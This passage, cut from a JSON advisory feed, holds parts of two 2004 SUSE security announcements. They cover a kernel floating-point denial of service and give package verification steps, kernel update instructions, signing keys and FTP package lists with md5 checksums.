verification, additional information\r\n\r\n - Package authenticity verification:\r\n\r\n SUSE update packages are available on many mirror ftp servers around\r\n the world. While this service is considered valuable and important\r\n to the free and open source software community, many users wish to be\r\n certain as to be the origin of the package and its content before\r\n installing the package. There are two independent verification methods\r\n that can be used to prove the authenticity of a downloaded file or\r\n rpm package:\r\n 1) md5sums as provided in the (cryptographically signed) announcement.\r\n 2) using the internal gpg signatures of the rpm package.\r\n\r\n 1) execute the command\r\n md5sum <name-of-the-file.rpm>\r\n after you have downloaded the file from a SUSE ftp server or its\r\n mirrors. Then, compare the resulting md5sum with the one that is\r\n listed in the announcement. Since the announcement containing the\r\n checksums is cryptographically signed (usually using the key\r\n security@suse.de), the checksums offer proof of the authenticity\r\n of the package.\r\n We recommend against subscribing to security lists which cause the\r\n email message containing the announcement to be modified so that\r\n the signature does not match after transport through the mailing\r\n list software.\r\n Downsides: You must be able to verify the authenticity of the\r\n announcement in the first place. If RPM packages are being rebuilt\r\n and a new version of a package is published on the ftp server, all\r\n md5 sums for the files are useless.\r\n\r\n 2) rpm package signatures provide an easy way to verify the authenticity\r\n of an rpm package. Use the command\r\n rpm -v --checksig <file.rpm>\r\n to verify the signature of the package, where <file.rpm> is the\r\n filename of the rpm package that you have downloaded. Of course,\r\n package authenticity verification can only target an un-installed rpm\r\n package file.\r\n Prerequisites:\r\n a) gpg is installed\r\n b) The package is signed using a certain key. The public part of this\r\n key must be installed by the gpg program in the directory\r\n ~/.gnupg/ under the user's home directory who performs the\r\n signature verification (usually root). You can import the key\r\n that is used by SUSE in rpm packages for SUSE Linux by saving\r\n this announcement to a file ("announcement.txt") and\r\n running the command (do "su -" to be root):\r\n gpg --batch; gpg < announcement.txt | gpg --import\r\n SUSE Linux distributions version 7.1 and thereafter install the\r\n key "build@suse.de" upon installation or upgrade, provided that\r\n the package gpg is installed. The file containing the public key\r\n is placed at the top-level directory of the first CD (pubring.gpg)\r\n and at ftp://ftp.suse.com/pub/suse/pubring.gpg-build.suse.de .\r\n\r\n\r\n - SUSE runs two security mailing lists to which any interested party may\r\n subscribe:\r\n\r\n suse-security@suse.com\r\n - general/linux/SUSE security discussion.\r\n All SUSE security announcements are sent to this list.\r\n To subscribe, send an email to\r\n <suse-security-subscribe@suse.com>.\r\n\r\n suse-security-announce@suse.com\r\n - SUSE's announce-only mailing list.\r\n Only SUSE's security announcements are sent to this list.\r\n To subscribe, send an email to\r\n <suse-security-announce-subscribe@suse.com>.\r\n\r\n For general information or the frequently asked questions (faq)\r\n send mail to:\r\n <suse-security-info@suse.com> or\r\n <suse-security-faq@suse.com> respectively.\r\n\r\n =====================================================================\r\n SUSE's security contact is <security@suse.com> or <security@suse.de>.\r\n The <security@suse.de> public key is listed below.\r\n =====================================================================\r\n______________________________________________________________________________\r\n\r\n The information in this advisory may be distributed or reproduced,\r\n provided that the advisory is not modified in any way. In particular,\r\n it is desired that the clear-text signature must show proof of the\r\n authenticity of the text.\r\n SUSE Linux AG makes no warranties of any kind whatsoever with respect\r\n to the information contained in this security advisory.\r\n\r\nType Bits/KeyID Date User ID\r\npub 2048R/3D25D3D9 1999-03-06 SuSE Security Team <security@suse.de>\r\npub 1024D/9C800ACA 2000-10-19 SuSE Package Signing Key <build@suse.de>\r\n\r\n#####-----BEGIN PGP PUBLIC KEY BLOCK-----\r\nVersion: GnuPG v1.0.6 (GNU/Linux)\r\nComment: For info see http://www.gnupg.org\r\n\r\n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\r\nDgCfZ5Wj+f7cnYpFZI6GkAyyczG09sE=\r\n=LRKC\r\n- -----END PGP PUBLIC KEY BLOCK-----\r\n\r\n- -- \r\n - -\r\n| Roman Drahtmüller <draht@suse.de> // "You don't need eyes to see, |\r\n SUSE Linux AG - Security Phone: // you need vision!"\r\n| Nürnberg, Germany +49-911-740530 // Maxi Jazz, Faithless |\r\n - -\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.0.7 (GNU/Linux)\r\n\r\niQEVAwUBQOWPL3ey5gA9JdPZAQFFzQf+Mo5WmO40BDHakn4qD5rAcfU6H/0rhMpy\r\nBi8r+g6GoSp/m2Zy+1O0Qn3jVb/iirVlnHH3DND1r/GunM3c5CTaMYt2Bt7PTOdt\r\nOsjD41lbiFlHDmmmaodROQvcrz7T67YU0gCtSKJdDfs2ATiiUOcyUQZNfi/PiEqD\r\njwmKpP5c1NXSXPSwZ2f430itJA5iUqqVBeB1WHn63kOnIKtHBJ9c6uw3rZ99t1OA\r\niud3L+VQSycb8xQSlOsuiaYW1S236VsogKWRbqY76eo7E2AnVQlMpcZkyW91/vfT\r\nWntQlZJAaGFX1q/IyGy+PGFPUoJjNc7H6jy5ZqJqXR5Sb0KrHfadCQ==\r\n=24bz\r\n-----END PGP SIGNATURE-----", "modified": "2004-07-03T00:00:00", "published": "2004-07-03T00:00:00", "id": "SECURITYVULNS:DOC:6436", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6436", "title": "SUSE Security Announcement: kernel (SUSE-SA:2004:020)", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:10", "bulletinFamily": "software", "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\n\r\n______________________________________________________________________________\r\n\r\n SUSE Security Announcement\r\n\r\n Package: kernel\r\n Announcement-ID: SuSE-SA:2004:017\r\n Date: Wednesday, Jun 16th 2004 15:20 MEST\r\n Affected products: 8.0, 8.1, 8.2, 9.0, 9.1\r\n SuSE Linux Database Server,\r\n SuSE eMail Server III, 3.1\r\n SuSE Linux Enterprise Server 7, 8\r\n SuSE Linux Firewall on CD/Admin host\r\n SuSE Linux Connectivity Server\r\n SuSE Linux Office Server\r\n Vulnerability Type: local denial-of-service attack\r\n Severity (1-10): 4\r\n SUSE default package: no\r\n Cross References: CAN-2004-0554\r\n\r\n Content of this advisory:\r\n 1) security vulnerability resolved:\r\n - floating point exception causes system crash\r\n problem description, discussion, solution and upgrade information\r\n 2) pending vulnerabilities, solutions, workarounds:\r\n - icecast\r\n - sitecopy\r\n - cadaver\r\n - OpenOffice_org\r\n - tripwire\r\n - postgresql\r\n - lha\r\n - XDM\r\n - mod_proxy\r\n 3) standard appendix (further information)\r\n\r\n______________________________________________________________________________\r\n\r\n1) problem description, brief discussion, solution, upgrade information\r\n\r\n The Linux kernel is vulnerable to a local denial-of-service attack.\r\n By using a C program it is possible to trigger a floating point\r\n exception that puts the kernel into an unusable state.\r\n To execute this attack a malicious user needs shell access to the\r\n victim's machine.\r\n The severity of this bug is considered low because local denial-of-\r\n service attacks are hard to prevent in general.\r\n Additionally the bug is limited to x86 and x86_64 architecture.\r\n\r\n\r\n\r\n SPECIAL INSTALL INSTRUCTIONS:\r\n ==============================\r\n The following paragraphs will guide you through the installation\r\n process in a step-by-step fashion. The character sequence "****"\r\n marks the beginning of a new paragraph. In some cases, the steps\r\n outlined in a particular paragraph may or may not be applicable\r\n to your situation.\r\n Therefore, please make sure to read through all of the steps below\r\n before attempting any of these procedures.\r\n All of the commands that need to be executed are required to be\r\n run as the superuser (root). Each step relies on the steps before\r\n it to complete successfully.\r\n Note: The update packages for the SuSE Linux Enterprise Server 7\r\n (SLES7) are being tested at the moment and will be published as soon\r\n as possible.\r\n\r\n\r\n **** Step 1: Determine the needed kernel type\r\n\r\n Please use the following command to find the kernel type that is\r\n installed on your system:\r\n\r\n rpm -qf /boot/vmlinuz\r\n\r\n Following are the possible kernel types (disregard the version and\r\n build number following the name separated by the "-" character)\r\n\r\n k_deflt # default kernel, good for most systems.\r\n k_i386 # kernel for older processors and chipsets\r\n k_athlon # kernel made specifically for AMD Athlon(tm) family processors\r\n k_psmp # kernel for Pentium-I dual processor systems\r\n k_smp # kernel for SMP systems (Pentium-II and above)\r\n k_smp4G # kernel for SMP systems which supports a maximum of 4G of RAM\r\n kernel-64k-pagesize\r\n kernel-bigsmp\r\n kernel-default\r\n kernel-smp\r\n\r\n **** Step 2: Download the package for your system\r\n\r\n Please download the kernel RPM package for your distribution with the\r\n name as indicated by Step 1. The list of all kernel rpm packages is\r\n appended below. Note: The kernel-source package does not\r\n contain a binary kernel in bootable form. Instead, it contains the\r\n sources that the binary kernel rpm packages are created from. It can be\r\n used by administrators who have decided to build their own kernel.\r\n Since the kernel-source.rpm is an installable (compiled) package that\r\n contains sources for the linux kernel, it is not the source RPM for\r\n the kernel RPM binary packages.\r\n\r\n The kernel RPM binary packages for the distributions can be found at the\r\n locations below ftp://ftp.suse.com/pub/suse/i386/update/.\r\n\r\n 8.0/images/\r\n 8.1/rpm/i586\r\n 8.2/rpm/i586\r\n 9.0/rpm/i586\r\n 9.1/rpm/i586\r\n\r\n After downloading the kernel RPM package for your system, you should\r\n verify the authenticity of the kernel rpm package using the methods as\r\n listed in section 3) of each SUSE Security Announcement.\r\n\r\n\r\n **** Step 3: Installing your kernel rpm package\r\n\r\n Install the rpm package that you have downloaded in Steps 3 or 4 with\r\n the command\r\n rpm -Uhv --nodeps --force <K_FILE.RPM>\r\n where <K_FILE.RPM> is the name of the rpm package that you downloaded.\r\n\r\n Warning: After performing this step, your system will likely not be\r\n able to boot if the following steps have not been fully\r\n followed.\r\n\r\n\r\n If you run SUSE LINUX 8.1 and haven't applied the kernel update\r\n (SUSE-SA:2003:034), AND you are using the freeswan package, you also\r\n need to update the freeswan rpm as a dependency as offered\r\n by YOU (YaST Online Update). The package can be downloaded from\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/\r\n\r\n **** Step 4: configuring and creating the initrd\r\n\r\n The initrd is a ramdisk that is loaded into the memory of your\r\n system together with the kernel boot image by the bootloader. The\r\n kernel uses the content of this ramdisk to execute commands that must\r\n be run before the kernel can mount its actual root filesystem. It is\r\n usually used to initialize SCSI drivers or NIC drivers for diskless\r\n operation.\r\n\r\n The variable INITRD_MODULES in /etc/sysconfig/kernel determines\r\n which kernel modules will be loaded in the initrd before the kernel\r\n has mounted its actual root filesystem. The variable should contain\r\n your SCSI adapter (if any) or filesystem driver modules.\r\n\r\n With the installation of the new kernel, the initrd has to be\r\n re-packed with the update kernel modules. Please run the command\r\n\r\n mk_initrd\r\n\r\n as root to create a new init ramdisk (initrd) for your system.\r\n On SuSE Linux 8.1 and later, this is done automatically when the\r\n RPM is installed.\r\n\r\n\r\n **** Step 5: bootloader\r\n\r\n If you run a SUSE LINUX 8.x, SLES8, or SUSE LINUX 9.x system, there\r\n are two options:\r\n Depending on your software configuration, you have either the lilo\r\n bootloader or the grub bootloader installed and initialized on your\r\n system.\r\n The grub bootloader does not require any further actions to be\r\n performed after the new kernel images have been moved in place by the\r\n rpm Update command.\r\n If you have a lilo bootloader installed and initialized, then the lilo\r\n program must be run as root. Use the command\r\n\r\n grep LOADER_TYPE /etc/sysconfig/bootloader\r\n\r\n to find out which boot loader is configured. If it is lilo, then you\r\n must run the lilo command as root. If grub is listed, then your system\r\n does not require any bootloader initialization.\r\n\r\n Warning: An improperly installed bootloader may render your system\r\n unbootable.\r\n\r\n **** Step 6: reboot\r\n\r\n If all of the steps above have been successfully completed on your\r\n system, then the new kernel including the kernel modules and the\r\n initrd should be ready to boot. The system needs to be rebooted for\r\n the changes to become active. Please make sure that all steps have\r\n completed, then reboot using the command\r\n shutdown -r now\r\n or\r\n init 6\r\n\r\n Your system should now shut down and reboot with the new kernel.\r\n\r\n\r\n There is no workaround known.\r\n\r\n\r\n Please download the update package for your distribution and verify its\r\n integrity by the methods listed in section 3) of this announcement.\r\n Then, install the package using the command "rpm -Fhv file.rpm" to apply\r\n the update.\r\n Our maintenance customers are being notified individually. The packages\r\n are being offered to install from the maintenance web.\r\n\r\n\r\n Intel i386 Platform:\r\n\r\n SuSE-9.1:\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-source-2.6.5-7.75.i586.rpm\r\n 8d11469e1815c5b2fa143fce62c17b95\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-default-2.6.5-7.75.i586.rpm\r\n 75222182ad4c766b6482e5b83658819d\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-smp-2.6.5-7.75.i586.rpm\r\n 45f1244f153ab1387a9dc67e7bcf20bb\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-bigsmp-2.6.5-7.75.i586.rpm\r\n 517647d955770503fe61ae2549c453dd\r\n source rpm(s):\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-source-2.6.5-7.75.src.rpm\r\n 9103503f430b9d854630ecb8855a2fb3\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-default-2.6.5-7.75.nosrc.rpm\r\n 9381c56f1f64835c5379dde278ac768d\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-smp-2.6.5-7.75.nosrc.rpm\r\n 4f47dc2be58f5315cf596c051c2892b5\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-bigsmp-2.6.5-7.75.nosrc.rpm\r\n 732c1e7d2a9e41780464eccdc0d54505\r\n\r\n SuSE-9.0:\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/kernel-source-2.4.21-226.i586.rpm\r\n 7b6022e2f80325b42fa7dc3188360530\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_athlon-2.4.21-226.i586.rpm\r\n 594efe04ccc233e890bfb277e8296c2d\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_deflt-2.4.21-226.i586.rpm\r\n f41d088cf20bfe583e57f95a6b46d625\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_smp-2.4.21-226.i586.rpm\r\n 39e2c09ece3f22b50eb777b85a7218ef\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_smp4G-2.4.21-226.i586.rpm\r\n 83398954810403b9dfb65bcf1af25352\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_um-2.4.21-226.i586.rpm\r\n 18dde4a8af68dd1f78a0177c3214457a\r\n source rpm(s):\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/kernel-source-2.4.21-226.src.rpm\r\n d5b037aaf122b1b05917e3f0b475baae\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_athlon-2.4.21-226.src.rpm\r\n e10aea97785eb12716ad7d5e20cbd723\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_deflt-2.4.21-226.src.rpm\r\n 54b8bbd368998abc1a63224caa880473\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_smp-2.4.21-226.src.rpm\r\n f944b14978ecd211c26f8169238292bf\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_smp4G-2.4.21-226.src.rpm\r\n 66a116aeb9757c538a0643e8322095a7\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_um-2.4.21-226.src.rpm\r\n 5e3694ba088fd39891a5979380679d20\r\n\r\n SuSE-8.2:\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/kernel-source-2.4.20.SuSE-113.i586.rpm\r\n a5843cb4e2b16515d70574d83113ac48\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_athlon-2.4.20-113.i586.rpm\r\n 724529485d3a304f0479f9216fc361af\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_deflt-2.4.20-113.i586.rpm\r\n b0e687c208053d546b7057257beb7d32\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_psmp-2.4.20-113.i586.rpm\r\n 749b101e7fc4aa5c62e2a5b650002803\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_smp-2.4.20-113.i586.rpm\r\n 3377544a5f6d9c73fdfe05140fce0813\r\n source rpm(s):\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/kernel-source-2.4.20.SuSE-113.src.rpm\r\n 0a41c750b8cd3953d47e27ea15c58697\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_athlon-2.4.20-113.src.rpm\r\n a5e5790e5f7fe62905d29750543c9e20\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_deflt-2.4.20-113.src.rpm\r\n 9defa7cb706e924f8336dd03fafbcfd5\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_psmp-2.4.20-113.src.rpm\r\n 8469dbc8810dd292100d085e00bb6081\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_smp-2.4.20-113.src.rpm\r\n d990fcbace1f21ff383abdf7608a17ef\r\n\r\n SuSE-8.1:\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/kernel-source-2.4.21-226.i586.rpm\r\n 43ee5eae102f0258a414dd15e3fd9433\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_athlon-2.4.21-226.i586.rpm\r\n 0c6289e168307d615bfe6cef9ebcf879\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_deflt-2.4.21-226.i586.rpm\r\n 003a38c53fe91070eeae85983930c70e\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_psmp-2.4.21-226.i586.rpm\r\n 657d08fa4b5a2ba7de2a314a7d1622e1\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_smp-2.4.21-226.i586.rpm\r\n e19239b4ca52ebd21f775b5e6195f144\r\n source rpm(s):\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/kernel-source-2.4.21-226.src.rpm\r\n ee67f5db0ea2f1431f46b7dd27815a56\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_athlon-2.4.21-226.src.rpm\r\n b29021156d6582e315666b16231b2a60\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_deflt-2.4.21-226.src.rpm\r\n ce5e47d527cee6968cd95bb8430d3e18\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_psmp-2.4.21-226.src.rpm\r\n a081a0f1e31f5491cdeba1fea5ea6411\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_smp-2.4.21-226.src.rpm\r\n 1dbfd3b5f272fc75342ae55bbe7ab45c\r\n\r\n SuSE-8.0:\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.0/d3/kernel-source-2.4.18.SuSE-299.i386.rpm\r\n 7de319a4e6c667fba359686b814d4a73\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_deflt-2.4.18-299.i386.rpm\r\n df5aad7c423625a19af151bbba0f2ca8\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_psmp-2.4.18-299.i386.rpm\r\n cb02c8381962eda997ebb115ef68ae4c\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_smp-2.4.18-299.i386.rpm\r\n 903c6e61927803c2d592ac50fe9da6ce\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_i386-2.4.18-299.i386.rpm\r\n e2abf9ccdc8191e7d2ace58e8a1b5b5a\r\n source rpm(s):\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/kernel-source-2.4.18.SuSE-299.nosrc.rpm\r\n 622c85342dd84abd0400103902d05eed\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_deflt-2.4.18-299.src.rpm\r\n 37916ea39febc4dd43fabfccce9322db\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_psmp-2.4.18-299.src.rpm\r\n 0dde0e6758e42de5479e8776475ae76f\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_smp-2.4.18-299.src.rpm\r\n 523bef4e31fa67f078d5fcbdc426a4c0\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_i386-2.4.18-299.src.rpm\r\n 06a2a062a54764a30adae0b8ea40cb29\r\n\r\n\r\n\r\n Opteron x86_64 Platform:\r\n\r\n SuSE-9.1:\r\n ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-source-2.6.5-7.75.x86_64.rpm\r\n 1c878b1e29a9bea40547637b6a307b2d\r\n ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-default-2.6.5-7.75.x86_64.rpm\r\n 16de3ee2390bb2b92f9fe50451d4f082\r\n ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-smp-2.6.5-7.75.x86_64.rpm\r\n c310268daa83f18fcfd4cf19434f06e0\r\n source rpm(s):\r\n ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-source-2.6.5-7.75.src.rpm\r\n 2fed0a8f3936027261add7d1cbfa5341\r\n ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-default-2.6.5-7.75.nosrc.rpm\r\n 9ad26d15566337c83273121390ea4e32\r\n ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-smp-2.6.5-7.75.nosrc.rpm\r\n 352951be42b3093efb0148320a6f4c27\r\n\r\n SuSE-9.0:\r\n ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/kernel-source-2.4.21-226.x86_64.rpm\r\n ced9c66ffa28bf7e7c795781f92083fe\r\n ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/k_deflt-2.4.21-226.x86_64.rpm\r\n 60539bc47e8cac0664ac5ca824d311e0\r\n ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/k_smp-2.4.21-226.x86_64.rpm\r\n 083aeedd2a88ccc2e00c8f66cd61b81c\r\n source rpm(s):\r\n 